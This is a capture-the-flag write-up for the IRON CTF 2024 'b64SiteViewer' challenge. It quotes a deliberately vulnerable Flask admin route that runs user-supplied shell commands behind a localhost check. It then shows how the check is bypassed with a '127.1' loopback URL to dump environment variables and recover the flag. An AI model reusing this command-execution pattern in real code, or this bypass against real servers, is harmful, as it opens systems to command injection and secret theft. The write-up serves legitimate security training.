# IRON CTF 2024 - b64SiteViewer
**Title:** b64SiteViewer
**Description:** Hey everyone, check out my new Base64 site viewer! The admin believes he's invincible. Do you have what it takes to outsmart him?
Flag Format: ironCTF{alphanumeric_lowercase}
`https://b64siteviewer.1nf1n1ty.team/`:
![image](https://hackmd.io/_uploads/r1zeNHekkg.png)
**Files:**
```bash
chall
├── app.py
├── flag.sh
├── requirements.txt
└── templates
└── home.html
```
## Solution:
First, I started with examining the given `app.py` Flask application to find any weaknesses that could be used to access the flag. The application has two main routes: the home route (`/`) which retrieves and shows the base64-encoded content of a URL provided by the user.
The `/admin` route is designed to execute shell commands provided via the `cmd` parameter. However, to prevent unauthorized access, it includes an IP address filter:
```python
if request.remote_addr in ['127.0.0.1', 'localhost']:
cmd = request.args.get('cmd', 'id')
if any(blacklisted in cmd for blacklisted in ['REDACTED', "'", '"']):
return render_template_string('Command blocked')
print(f"Executing: {cmd}")
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
return result.stdout
return render_template_string("Don't hack me")
```
This filter is meant to restrict command execution to requests originating from the server itself (i.e., localhost).
The IP filter specifically looks for `127.0.0.1` and `localhost`. However, it doesn't account for IPv4 addresses like `127.1`, which are technically the same as `127.0.0.1` because of how the loopback address range `(127.0.0.0/8)` is defined. This means that `127.1` still directs traffic to the loopback interface, but it's not explicitly blocked in the code.
To exploit this oversight, I crafted a request to the `/admin` route using `'127.1'` as the hostname, bypassing the IP filter:
```bash
http://127.1:5000/admin?cmd=set
```
Here's a breakdown of the payload:
1. **Bypassing the IP Filter:** Using `127.1`, which isn't blacklisted but still points to localhost, bypassing the IP check.
2. **Executing the Command:** The '`cmd` parameter is set to '`set`', which reveals environment variables, potentially including sensitive data like the flag.
Upon entering the URL: `http://127.1:5000/admin?cmd=set`, this is the response I received:
```bash
base64 version of the site: b'SUZTPScgCQonCkxDX0NUWVBFPSdDLlVURi04JwpPTERQV0Q9Jy8nCk9QVElORD0nMScKUEFUSD0nL3Vzci9sb2NhbC9zYmluOi91c3IvbG9jYWwvYmluOi91c3Ivc2JpbjovdXNyL2Jpbjovc2JpbjovYmluJwpQUElEPScyJwpQUzE9JyQgJwpQUzI9Jz4gJwpQUzQ9JysgJwpQV0Q9Jy9ob21lL3VzZXInClNITFZMPScxJwpXRVJLWkVVR19TRVJWRVJfRkQ9JzMnCl89Jy91c3IvbG9jYWwvYmluL3B5dGhvbicKZmxhZz0naXJvbkNURnt5MHU0cjNyMGNrMW42azMzcGg0Y2sxbjZ9Jwo='
```
I decoded it, and here’s what I received:
```bash
IFS='
'
LC_CTYPE='C.UTF-8'
OLDPWD='/'
OPTIND='1'
PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'
PPID='2'
PS1='$ '
PS2='> '
PS4='+ '
PWD='/home/user'
SHLVL='1'
WERKZEUG_SERVER_FD='3'
_='/usr/local/bin/python'
flag='ironCTF{y0u4r3r0ck1n6k33ph4ck1n6}'
```
And there's our flag: `ironCTF{y0u4r3r0ck1n6k33ph4ck1n6}`